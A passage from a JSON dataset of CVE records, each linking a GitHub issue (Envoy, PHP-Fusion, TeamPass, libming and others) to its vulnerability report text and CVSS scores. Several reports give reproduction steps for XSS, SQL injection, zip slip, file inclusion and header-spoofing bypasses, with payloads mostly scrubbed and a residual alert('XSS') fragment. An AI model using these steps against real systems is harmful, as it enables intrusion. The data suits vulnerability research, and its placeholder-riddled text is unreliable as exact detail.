        "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/6767",
        "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/6767",
        "Repo_new": "envoyproxy/envoy",
        "Issue_Created_At": "2019-05-01T14:21:34Z",
        "description": "Envoy does not adhere to HTTP NUMBERTAG RFC NUMBERTAG Title : Envoy does not adhere to HTTP NUMBERTAG RFC NUMBERTAG Description : >RFC NUMBERTAG Section NUMBERTAG and NUMBERTAG specifies when a request coming in through a re used HTTP NUMBERTAG connection is accidentally sent to a non origin but authoritative server that a NUMBERTAG response should be returned. This can happen if two servers one with a wildcard certificate (e.g., a. APITAG and another server (b. APITAG with a non wildcard on the same IP address using SNI responds to requests those meant for server b.example.com will accidentally be forwarded down the re used HTTP NUMBERTAG connection for a. APITAG In this situation a.example.com should send back a NUMBERTAG to indicate the request was destined for b. APITAG This forces browsers to re establish a new connection, re negotiate the SNI, and thus the backing server and subsequently route to the correct origin. [optional Relevant Links :] FILETAG section describing connection re use FILETAG section describing misdirected response CVETAG The bug was originally filed against Chromium however they indicated Istio was the issue. URLTAG The bug was then filed against istio who indicated envoy was the issue.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.1,
        "impactScore": 1.4,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2020-11872",
        "Issue_Url_old": "https://github.com/opentrace-community/opentrace-cloud-functions/issues/7",
        "Issue_Url_new": "https://github.com/opentrace-community/opentrace-cloud-functions/issues/7",
        "Repo_new": "opentrace-community/opentrace-cloud-functions",
        "Issue_Created_At": "2020-04-13T09:37:43Z",
        "description": "Incorrect IV Initialisation for AES NUMBERTAG GCM and Constraints on the Number of Invocations. The current implementation does not follow NIST Special Publication NUMBERTAG D, in particular Section NUMBERTAG IV Constructions and NUMBERTAG Constraints on the Number of Invocations regarding the secret key. To mitigate NUMBERTAG IVs can be converted to deterministic construction per NUMBERTAG To mitigate NUMBERTAG Temporary IDs should use an ephemeral key derived from the secret key and uid values, so that the same key is not used for more than NUMBERTAG operations. The current implementation may permit an adversary to fabricate IDs or Upload Tokens, if they collect duplicated IVs or more than NUMBERTAG encryption operations are performed against the same key.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-11887",
        "Issue_Url_old": "https://github.com/domenic/svg2png/issues/117",
        "Issue_Url_new": "https://github.com/domenic/svg2png/issues/117",
        "Repo_new": "domenic/svg2png",
        "Issue_Created_At": "2020-04-17T02:35:29Z",
        "description": "SSRF and Server Side XSS. this package uses phantomjs to render a xml snippet to image\uff0cthus the xml can be any html ,script. As the render process runs at backend,so there aressrf and server side xss risks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-11888",
        "Issue_Url_old": "https://github.com/trentm/python-markdown2/issues/348",
        "Issue_Url_new": "https://github.com/trentm/python-markdown2/issues/348",
        "Repo_new": "trentm/python-markdown2",
        "Issue_Created_At": "2020-04-13T00:38:25Z",
        "description": "Another Filter bypass leading to XSS. On the latest release NUMBERTAG a payload like this one can lead to xss and bypass safe_mode when set to true. APITAG The Problem: I think its due to just bad regex's not detecting non alphanumeric tags. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-11894",
        "Issue_Url_old": "https://github.com/libming/libming/issues/196",
        "Issue_Url_new": "https://github.com/libming/libming/issues/196",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2020-04-17T02:47:07Z",
        "description": "heap overflow in APITAG APITAG ./swftocxx $poc FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-11895",
        "Issue_Url_old": "https://github.com/libming/libming/issues/197",
        "Issue_Url_new": "https://github.com/libming/libming/issues/197",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2020-04-17T02:50:13Z",
        "description": "heap overflow in APITAG APITAG ./swftocxx $poc FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-11944",
        "Issue_Url_old": "https://github.com/bitcoin-abe/bitcoin-abe/issues/292",
        "Issue_Url_new": "https://github.com/bitcoin-abe/bitcoin-abe/issues/292",
        "Repo_new": "bitcoin-abe/bitcoin-abe",
        "Issue_Created_At": "2020-04-20T21:24:43Z",
        "description": "Page Not Found Handler Cross site Scripting CVETAG . A lack of filtering around line NUMBERTAG of abe.py ERRORTAG allows attackers to abuse the Page Not Found error handler and pass rogue APITAG to unsuspecting users using a specially crafted URL: ERRORTAG MITRE has assigned CVETAG URLTAG to this flaw. Thank you.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-12071",
        "Issue_Url_old": "https://github.com/anchorcms/anchor-cms/issues/1333",
        "Issue_Url_new": "https://github.com/anchorcms/anchor-cms/issues/1333",
        "Repo_new": "anchorcms/anchor-cms",
        "Issue_Created_At": "2020-04-22T19:08:17Z",
        "description": "Stored Cross Site Scripting Exists in post content.. Summary A user is able to inject APITAG into a post via the post creation feature. Expected Behaviour The CMS should HTML encode any inputted data so it is reflected back safely to the user. Actual Behaviour The CMS reflects back the post content without HTML encoding, meaning the client browser renders it as valid HTML / JS on the main page, and on that posts page. This can lead to malicious javascript being executed on anyone who visits the site's browser. Context details (if applicable) Anchor version NUMBERTAG Server setup: Ubuntu running apache2 and PHP NUMBERTAG Reproduction NUMBERTAG Login to admin panel NUMBERTAG Create a blog post where the post title can be anything, and post content is an XSS payload, in my case, I used APITAG NUMBERTAG Go to the main page to trigger the payload, alternatively, go to the blog post created in the previous step, this too shall trigger the payload. FILETAG As we can see in the blog post source, the title and category are both HTML encoded before being reflected back to the user, although, the post content is not, and our browser renders our JS as valid code. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-12079",
        "Issue_Url_old": "https://github.com/beakerbrowser/beaker/issues/1519",
        "Issue_Url_new": "https://github.com/beakerbrowser/beaker/issues/1519",
        "Repo_new": "beakerbrowser/beaker",
        "Issue_Created_At": "2020-03-10T08:47:37Z",
        "description": "Security issue report. hello, I've find a critical vulnerability inside beaker browser, and have sent you details of this vulnerability by sending email to MENTIONTAG . Please check it and feel free to contact me.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12102",
        "Issue_Url_old": "https://github.com/prasathmani/tinyfilemanager/issues/357",
        "Issue_Url_new": "https://github.com/prasathmani/tinyfilemanager/issues/357",
        "Repo_new": "prasathmani/tinyfilemanager",
        "Issue_Created_At": "2020-05-11T04:33:34Z",
        "description": "security breaches in tiny file manager. hi, are you aware of this? URLTAG see also other mentions: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.7,
        "impactScore": 4.0,
        "exploitabilityScore": 3.1
    },
    {
        "CVE_ID": "CVE-2020-12265",
        "Issue_Url_old": "https://github.com/kevva/decompress/issues/71",
        "Issue_Url_new": "https://github.com/kevva/decompress/issues/71",
        "Repo_new": "kevva/decompress",
        "Issue_Created_At": "2019-10-04T07:09:44Z",
        "description": "Vulnerable to zip slip. It appears as decompress is vulnerable to archives containing files that hold path traversal names such as APITAG . As a APITAG I have attached a .tar archive that will, when extracted, create a file in APITAG . Use the example code to extract: APITAG Note that this will not work out of the box with .zip archives since yauzl will throw an exception if the entry's filename contains \" APITAG \".",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12286",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6333",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6333",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-04-28T03:53:17Z",
        "description": "APITAG permission is not scoped to any dimensions e.g. Projects, environments and tenants. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) The bug APITAG permission is not scoped to any dimension. e.g. Scoped users scoped to Tenant A are able to view server tasks scoped to Tenant B. Description APITAG Affected versions APITAG Octopus Server: Affects at least NUMBERTAG APITAG Fixed in APITAG APITAG and master Mitigation APITAG NA Workarounds APITAG NA Relevant Pull Request(s) URLTAG Relevant Private Isssue(s) URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-12286",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6331",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6331",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-04-28T03:36:15Z",
        "description": "APITAG permission is not scoped to any dimensions e.g. Projects, environments and tenants. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) The bug APITAG permission is not scoped to any dimension. e.g. Scoped users scoped to Tenant A are able to view server tasks scoped to Tenant B. Description APITAG Affected versions APITAG Octopus Server: Affects at least NUMBERTAG APITAG Fixed in APITAG APITAG and master Mitigation APITAG NA Workarounds APITAG NA",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-12286",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6332",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6332",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-04-28T03:44:10Z",
        "description": "APITAG permission is not scoped to any dimensions e.g. Projects, environments and tenants. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) The bug APITAG permission is not scoped to any dimension. e.g. Scoped users scoped to Tenant A are able to view server tasks scoped to Tenant B. Description APITAG Affected versions APITAG Octopus Server: Affects at least NUMBERTAG APITAG Fixed in APITAG APITAG and master Mitigation APITAG NA Workarounds APITAG NA Relevant Pull Request(s) URLTAG Relevant Private Isssue(s) URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-12438",
        "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2307",
        "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2307",
        "Repo_new": "php-fusion/PHP-Fusion",
        "Issue_Created_At": "2020-04-27T14:46:08Z",
        "description": "Cross Site Scripting Vulnerability on \"banner\" feature in PHP Fusion NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a stored XSS vulnerability in the \"banner\" feature. This was previously patched to remove any \" APITAG \" tags in the banner, although this can be bypassed by using HTML event handlers, such as \"onerror\". To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click edit on banner one, or add a new banner NUMBERTAG Insert payload \" APITAG APITAG NUMBERTAG iew the page to trigger XSS. Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Screenshots FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version of Browser NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-12439",
        "Issue_Url_old": "https://github.com/mimblewimble/grin/issues/3235",
        "Issue_Url_new": "https://github.com/mimblewimble/grin/issues/3235",
        "Repo_new": "mimblewimble/grin",
        "Issue_Created_At": "2020-02-20T15:50:04Z",
        "description": "Rework output_pos index (better txhashset transactional support). Recent exploration into the implementation of an index of \"recently seen\" kernels led us down the path of maintaining an \"undo\" list per block. This way we can robustly handle duplicate kernels, maintaining the pos of the most recent instance of the kernel in the index, while being able to handle rewind scenarios involving previous instances of the kernel. Related URLTAG We do something similar to this for the APITAG index currently where we track a bitmap of spent output pos per block. And during rewind we use this per block bitmap to ensure the UTXO set is consistent with rewound chain state. Note that this allows the utxo set to be rewound reliably but leaves \"false positives\" in the APITAG index as we do not rewind the index itself. So we have always used the APITAG index as non authoritative. During rewind we can (and will expect to) encounter \"false positive\" results from the index. We may find an entry in the index for a given output, but we do not yet know for sure if this index entry is accurate. So we go to the PMMR itself for authoritative view of chain state. The process is roughly look in output_pos for possible result if nothing in index then output is spent if we find a result in the index, look in the output PMMR compare output commitment between index and PMMR if match then output is unspent otherwise output is spent It became apparent during the kernel index exploration that there is a better way to do this that can also be applied to the APITAG index. Rather than storing a bitmap of spent output positions which is by definition unsorted, we can store a vec of output positions where the sort order is consistent with the inputs to the block. This provides the ability to map positions to input commitments themselves. Rewind can now take advantage of this to ensure the output_pos index remains consistent with the rewound chain state. The APITAG index can be maintained transactionally alongside block processing, in both regular (apply new block) and rewound directions. This eliminates the possibility for \"false positives\" in the index lookup. If we find an entry in the index then we know the output is unspent. If we do not find an entry, the output is spent, or never existed. This involves a change to what we store in the db. We need to store a vec of output_pos (and associated block heights) rather than the existing serialized bitmap per block. This also involves changes to both APITAG and the APITAG impls to update the APITAG as necessary, within the txhashset extension (and therefore transactionally). Reworking the APITAG index to handle transactional rewind in this way gives us a clear path forward to use the same approach for the APITAG index. Rather than \"spending\" outputs we replace kernels with more recent instances (in the \"recently seen\" index). We have this working on a branch. PR coming shortly for these changes. Ideally we can get this into APITAG and allow it to be sufficiently tested and released as part of APITAG . Tracking this here so we can tag it as scheduled for inclusion in APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12458",
        "Issue_Url_old": "https://github.com/grafana/grafana/issues/8283",
        "Issue_Url_new": "https://github.com/grafana/grafana/issues/8283",
        "Repo_new": "grafana/grafana",
        "Issue_Created_At": "2017-05-03T16:54:15Z",
        "description": "APITAG Wrong permissions in grafana package for grafana.db. It looks like in URLTAG there were plans to lock down the sqlite DB to NUMBERTAG While grafana.ini did get locked down, the DB did not. Unless this is no longer believed to be necessary I could try to send a PR. What Grafana version are you using NUMBERTAG What datasource are you using? APITAG What OS are you running grafana on? APITAG NUMBERTAG What did you do? Logged into grafana.db as a regular user What was the expected result? Permission denied What happened instead? Logged in without issue, able to query salt and password for users CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-12460",
        "Issue_Url_old": "https://github.com/trusteddomainproject/OpenDMARC/issues/64",
        "Issue_Url_new": "https://github.com/trusteddomainproject/opendmarc/issues/64",
        "Repo_new": "trusteddomainproject/opendmarc",
        "Issue_Created_At": "2020-07-25T10:48:50Z",
        "description": "Memory corruption in APITAG There is a memory corruption vulnerability in APITAG of libopendmarc during parsing of DMARC aggregate reports. The root cause is improper null termination. The function APITAG does not explicitly add a null terminator NUMBERTAG to the buffer holding the XML data after reading the contents from a report file. This can cause an off by one error in APITAG in certain cases depending on the report file, resulting in a one byte heap overflow. A null byte write occurs during the parsing at APITAG APITAG . Eventually, during parsing of a specially crafted report, this null byte will overflow to the next chunk on the heap, overwriting the heap metadata, as indicated by the following valgrind output. CODETAG The size field and the least significant bits used as flags are overwritten in the metadata. The relevant flag for this vulnerability is the bit indicating 'previous chunk in use', known as PREV_INUSE which will be set to zero and determines if the previous chunk (storing bufp) is free. When the buffer is later free'd at APITAG APITAG a crash occurs as bufp is listed as not used. ERRORTAG A remote attacker could provide a specially crafted report that is parsed by this library, causing a denial of service. It could possibly lead to code execution depending on how libopendmarc is used and integrated into the application and in particular if the opendmarc_xml function is used explicitly without calling opendmarc_xml_parse and with input that is not null terminated. A DMARC aggregate report that triggers this vulnerability can be generated using the following commands: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12461",
        "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2308",
        "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2308",
        "Repo_new": "php-fusion/PHP-Fusion",
        "Issue_Created_At": "2020-04-28T18:43:09Z",
        "description": "Authenticated SQL Injection Exists in any page that allows control over the sort order.. Describe the bug A SQLi exists in any page that allows control over the order of the response from the SQL query ran on the database, as far as I can tell. I have verified the existence of the SQLi by monitoring the APITAG logs, and noticing I have control over anything after the \"ORDERY BY\" parameter. Although people thing this clause is not exploitable, it actually is, fairly simply, as I demonstrated here: URLTAG I am happy to send an example payload that allows for data exfiltration in private, although I think until this is patched, a working payload should not be made public. To Reproduce Steps to reproduce the behavior NUMBERTAG Login on the app NUMBERTAG Go to the \"search for members\" feature NUMBERTAG Change the order by parameter and click search NUMBERTAG Notice the URL now contains additional GET parameters, one of which is \"sort_order NUMBERTAG Strip target URL of unnecessary parts, leaving something like: APITAG NUMBERTAG Insert ORDER BY SQLi payload into sort_order parameter NUMBERTAG Depending on database output, and order, you can judge what the output of the binary query was, and exfiltrate data. Expected behavior Only allow the selection of \"ASC\" or \"DESC\" (non case sensitive), this is all you need for the desired functionality. __WARNING, DO NOT JUST BLOCK WHITESPACES, EXPLICITLY MATCH ASC OR DESC__. Screenshots FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version NUMBERTAG Additional context This was tested on the latest version, more information available upon request. For clarity, if the query failed, the APITAG Logs would not have my modification in it. This can be modified to a variety of things, as long as it is valid SQL syntax.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-12477",
        "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2761",
        "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2761",
        "Repo_new": "nilsteampassnet/teampass",
        "Issue_Created_At": "2020-04-02T16:10:04Z",
        "description": "IP whitelist bypass. Teampass includes a feature to restrict the source IP address users can use to interact with Teampass. The value of the source IP address is defined from the first value in the X Forwarded For header in the client request. Due to the fact that the client controls the X Forwarded For header and can set it to any value of their choosing, this header can be set to a whitelisted value which allows any client that can guess a whitelisted IP address to interact with Teampass from wherever they like. Steps to reproduce NUMBERTAG Add NUMBERTAG to the list of API IP Addresses allowed NUMBERTAG Make an API call with an appropriate X Forwarded For header and notice that the call is valid APITAG Steps to fix No data in headers provided by the client can be trusted, including X Forwarded For. The only reliable data about a client IP address is in the Source Address field in a TCP packet ( FILETAG . Server configuration Teampass version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12478",
        "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2764",
        "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2764",
        "Repo_new": "nilsteampassnet/teampass",
        "Issue_Created_At": "2020-04-02T16:18:48Z",
        "description": "Some Teampass files are available without authentication. Many of the files included in Teampass are available without authentication to anyone who can interact with the web server. While this may not be an issue for some of the images or Javascript files, it is an issue for the user uploaded files that are available without authentication. These include: upload dir all file uploads (encrypted) avatars dir all profile pictures backups dir (presumably) Teampass backups Note that accessing the scripts here can also trigger the backups to run files dir PDFs generated via admin functions are saved here many files under the \u201cincludes\u201d directory miscellaneous files under web root FILETAG , APITAG Dockerfile, etc) Additionally, it does not appear that Teampass checks to see if directory listing is turned on on the web server. This feature is frequently on by default and when left on, makes it easy to discover the hashed file names that are sometimes used. Steps to reproduce Use a simple curl request to retrieve one of the files I noted above. EG: APITAG Steps to fix Review what files and directories should be exposed without authentication Ensure that only authenticated users can attempt to access files in sensitive directories (upload, backups, files, etc) Ensure that only authorized users can actually retrieve files in sensitive directories Server configuration Teampass version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12479",
        "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2762",
        "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2762",
        "Repo_new": "nilsteampassnet/teampass",
        "Issue_Created_At": "2020-04-02T16:12:17Z",
        "description": "PHP arbitrary file include. Teampass allows users to choose from several different languages. The user changes their language preference by sending a POST request to Teampass ( APITAG ) that contains the string of the language they choose (\u201cenglish\u201d, \u201cspanish\u201d, etc). This string provided by the user is not validated or sanitized in any way. After the string provided by the user is stored in the DB, it is eventually used in APITAG during login on line NUMBERTAG APITAG This allows any user to file_include any existing PHP file on disk. If a user could upload their own PHP file, then it could be combined with this bug to achieve code execution on the Teampass server. Steps to fix Validate the value from the APITAG parameter. The only permissible values should be a hard coded list of strings that exist in PATHTAG directory. In the case of a non valid value, Teampass should deny the language change and immediately stop processing the data in the APITAG parameter Server configuration Teampass version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-12607",
        "Issue_Url_old": "https://github.com/AntonKueltz/fastecdsa/issues/52",
        "Issue_Url_new": "https://github.com/antonkueltz/fastecdsa/issues/52",
        "Repo_new": "antonkueltz/fastecdsa",
        "Issue_Created_At": "2020-04-13T15:05:16Z",
        "description": "ECDSA verification fails for extreme value in k and s NUMBERTAG P NUMBERTAG SHA NUMBERTAG Hello, When verifying a ECDSA signature (P NUMBERTAG SHA NUMBERTAG with a extreme value in k and s NUMBERTAG the verification fails even if the signature is correct. It is possible to check this using the Google Wycheproof test NUMBERTAG URLTAG ERRORTAG I've added a APITAG using fast ecdsa and python cryptography (below). ERRORTAG Best regards, Antonio",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12666",
        "Issue_Url_old": "https://github.com/go-macaron/macaron/issues/198",
        "Issue_Url_new": "https://github.com/go-macaron/macaron/issues/198",
        "Repo_new": "go-macaron/macaron",
        "Issue_Created_At": "2020-04-30T13:58:41Z",
        "description": "vulnerablilitiy NUMBERTAG APITAG URLTAG \u9700\u8981\u5f00\u542f\u9759\u6001\u6587\u4ef6\u670d\u52a1 \u6f0f\u6d1e\u4ee3\u7801 CODETAG \u53ea\u8981\u4f7f\u7528\u4e86 APITAG \u6bd4\u5982\u8bbf\u95ee\uff1a FILETAG \u5373\u53ef\u8df3\u5230evoa.me APITAG \u5206\u6790\u4e00\u4e0b\uff0c\u4ee5 APITAG \u4e3a\u4f8b APITAG APITAG APITAG APITAG PATHTAG \u8fd4\u56de\u5934\u5bf9\u5e94\u7684location\u4e3a APITAG APITAG PATHTAG \u7f16\u7801\u4e3a APITAG APITAG \u4e3e\u4e2a\u4f8b\u5b50 \u6bd4\u5982\u5047\u5982\u7a0b\u5e8f\u91cc\u6709\u8fd9\u4e48\u4e00\u4e2a\u4ee3\u7801 ERRORTAG APITAG APITAG APITAG APITAG APITAG by the way, django\u66fe\u7ecf\u4e5f\u6709\u4e00\u4e2a\u5dee\u4e0d\u591a\u7684\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u770b\u770b\u8fd9\u7bc7\u6587\u7ae0\uff1a URLTAG \u4fee\u590d\u5efa\u8bae\uff1a \u5bf9\u91cd\u5b9a\u5411\u7684url\u8fdb\u884c\u5224\u65ad\uff0c\u4e0d\u5141\u8bb8//\u5f00\u5934 \u7531\u8877\u7684\u611f\u8c22\u60a8\u770b\u5b8c\u8fd9\u4e48\u957f\u4e00\u7bc7issue\u62a5\u544a",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-12706",
        "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2306",
        "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2306",
        "Repo_new": "php-fusion/PHP-Fusion",
        "Issue_Created_At": "2020-04-09T07:56:22Z",
        "description": "Multi Cross site scripting (XSS) vulnerabilities php fusion NUMBERTAG Describe the bug Cross site scripting (XSS) vulnerabilities in PHP Fusion NUMBERTAG allow remote attackers to inject arbitrary web script or HTML To Reproduce Steps to reproduce the behavior NUMBERTAG Login as member NUMBERTAG Go to 'Q&A or shoutbo NUMBERTAG Submit malicious content NUMBERTAG Login as admin and view Q&A or shout content NUMBERTAG SS trigger Expected behavior When admin view content, a pop up will be displayed Screenshots FILETAG Desktop (please complete the following information): OS: Windows NUMBERTAG Browser: Firefox or Chrome Version: Smartphone (please complete the following information): Device: [e.g. APITAG OS: [e.g. iOS NUMBERTAG Browser [e.g. stock browser, safari] Version [e.g NUMBERTAG Additional context POC at: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-12708",
        "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2310",
        "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2310",
        "Repo_new": "php-fusion/PHP-Fusion",
        "Issue_Created_At": "2020-04-30T08:09:05Z",
        "description": "Reflected XSS on FILETAG and FILETAG . Describe the bug Reflected cross site scripting (XSS) vulnerabilities in PHP Fusion NUMBERTAG allow remote attackers to inject arbitrary web script or HTML via FILETAG and FILETAG To Reproduce User authenticated or unauthenticated click to link bellow and script will be executed: URLTAG APITAG >alert('XSS') APITAG URLTAG APITAG >alert('XSS') APITAG Tested on OS: Windows NUMBERTAG Browser: Firefox and Chrome Please check it! Thanks",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-12718",
        "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2309",
